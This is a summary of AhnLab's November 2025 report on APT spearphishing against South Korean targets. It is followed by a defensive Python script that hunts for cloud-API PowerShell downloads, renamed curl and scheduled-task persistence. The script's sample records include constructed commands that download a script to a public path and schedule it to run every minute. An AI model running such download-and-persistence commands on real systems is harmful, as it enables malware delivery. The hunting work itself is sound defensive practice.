November 2025 APT Attack Trends Report (Domestic)
2025-12-12 • AhnLab
AhnLab's November 2025 domestic APT monitoring found spearphishing remained the main delivery path against South Korean targets, with malicious attachments or links used to trigger payload execution. The observed cases included LNK files carrying PowerShell commands that used the Dropbox API or Google Drive to download malware, create additional scripts under public user paths, and run obfuscated RAT payloads. Final-stage malware included XenoRAT and RoKRAT, with capabilities such as keylogging, screen capture, command execution, directory listing, file upload, and file download. Other samples downloaded AutoIt components, copied curl.exe under alternate filenames, and registered scheduled tasks for persistence, giving defenders concrete delivery and persistence patterns to hunt in Korean environments.
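One way to hunt for the delivery and persistence patterns summarized above, as an added example that is not taken from the AhnLab report. The record fields are modelled on Sysmon Event ID 1 (process creation), and the cloud host list, tag names, and sample records are assumptions constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Assumed host list for the two cloud services the summary names.
CLOUD = re.compile(r"dropboxapi\.com|dropbox\.com|drive\.google\.com|googleapis\.com", re.I)
PUBLIC = re.compile(r"\\users\\public\\", re.I)
DELIVERY = {"powershell_cloud_download", "renamed_curl"}
PERSISTENCE = {"scheduled_task_create"}

def classify(ev):
    """Return the hunt tags matched by one process-creation record."""
    tags = set()
    image = PureWindowsPath(ev["image"]).name.lower()
    cmd = ev["cmdline"]
    if image in ("powershell.exe", "pwsh.exe"):
        if CLOUD.search(cmd):
            tags.add("powershell_cloud_download")
        if PUBLIC.search(cmd):
            tags.add("script_in_public_path")
    # Renamed curl: version-info name is curl.exe but the file on disk is not.
    if ev.get("original_name", "").lower() == "curl.exe" and image != "curl.exe":
        tags.add("renamed_curl")
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        tags.add("scheduled_task_create")
    return tags

def hunt(events):
    """Return hosts that show both a delivery tag and a persistence tag."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(classify(ev))
    return {h: sorted(t) for h, t in per_host.items()
            if t & DELIVERY and t & PERSISTENCE}

def rec(host, image, original_name, cmdline):
    return {"host": host, "image": image, "original_name": original_name, "cmdline": cmdline}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
# Constructed records; field names modelled on Sysmon Event ID 1, values are made up.
SAMPLE = [
    rec("WS01", PS, "PowerShell.EXE",
        r"powershell iwr https://content.dropboxapi.com/2/files/download -OutFile C:\Users\Public\a.ps1"),
    rec("WS01", r"C:\Users\Public\upd.exe", "curl.exe", r"upd.exe -o C:\Users\Public\b.bin https://example.invalid/b"),
    rec("WS01", SCHTASKS, "schtasks.exe", r"schtasks /create /tn Upd /tr C:\Users\Public\a.ps1 /sc minute"),
    rec("WS02", r"C:\Windows\System32\curl.exe", "curl.exe", "curl.exe https://example.invalid/health"),
    rec("WS03", SCHTASKS, "schtasks.exe", r"schtasks /create /tn Backup /tr C:\Tools\backup.cmd /sc daily"),
]

if __name__ == "__main__":
    print(hunt(SAMPLE))
```

Requiring a delivery tag and a persistence tag on the same host keeps routine scheduled-task creation (WS03) and legitimate curl.exe use (WS02) out of the results.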